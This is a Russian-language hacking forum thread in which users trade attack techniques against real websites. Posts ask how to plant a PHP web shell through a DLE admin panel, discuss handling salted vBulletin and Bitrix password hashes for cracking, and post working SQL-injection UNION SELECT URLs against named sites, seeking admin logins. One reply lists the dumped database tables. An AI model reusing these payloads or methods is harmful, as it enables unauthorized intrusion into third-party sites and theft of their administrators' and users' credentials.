Здрасте... подскажите как залить шелл через админку в ДЛЕ. Точой версии сказать не могу. Модуль "Архив файлов" отсутствует. Добавил в допустимые файлы для загрузки расширения .php .phtml но когда добавляю новость и загружаю файл и после этого кликаю на файлик то происходит загрузка файла в виде download.php?id=7. Подскажите как выйти из ситуации
сабж касается солей хэшей в Vbulletin в Vbulletin нередко имеют место 4-ех символьные соли. Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя. примеры 4-символьных солей VBulletin: Code: C\"Y FD\\ =\"a \"]O \\@n \\|t Dy\\ J\\, @\\% .m\\ X\"K w\"P \"hH \\mz @\"B b7\\ y\\b s\"# tW\" Q!\\ \">2 _\"P \\tP \\gq F\'4 примеры 3-символьных солей VBulletin со слэшем: Code: YD\ ],\ W$\ ]_\ Dd\ вопрос: в каких случаях слэш экранирует сам себя, а в каких нет?
в 7-й версии битрикс использует чистый мд5 (32 символа) а в 8-й версии хеш уже 40 символов, то есть неободимо отбросить ненужные символы (salt) то есть в данном случае хеш будет выглядеть так : Code: fb6e1ad1bf85366d9a91b6e43b87f53b
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto возможно что нибудь сделать? это хотяб бы баг?
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto оригинал
Эм Code: Ошибка: У Вас нет прав для доступа к этому модулю. Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
есть ошибка Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40 которая появляется если сделать запрос типа http://bla-bla-bla/index.php?showmenu=true&id=999999999999999 что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути. Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
Раз уж на вопрос не ответили,буду археологом,просто не видел раньше. Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например: Code: [B]\'*([/B] - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью. (&\\ - слуш экранируеться,так как последний слеш являеться частью соли. Подругому не бывает ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20information_schema.tables+--+ SQL-inj+inc.Раскрутить не смог.
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9 Можно ли вытащить логин и пароль от админки
http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%28%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+
Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами. Скриптом достал спиоск таблиц,может пригодиться. Code: COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE PARTITIONS PLUGINS PROCESSLIST REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS CHANNEL CHANNEL_NEW CHANNEL_POLL NEWS NEWS1 POLL PRICES
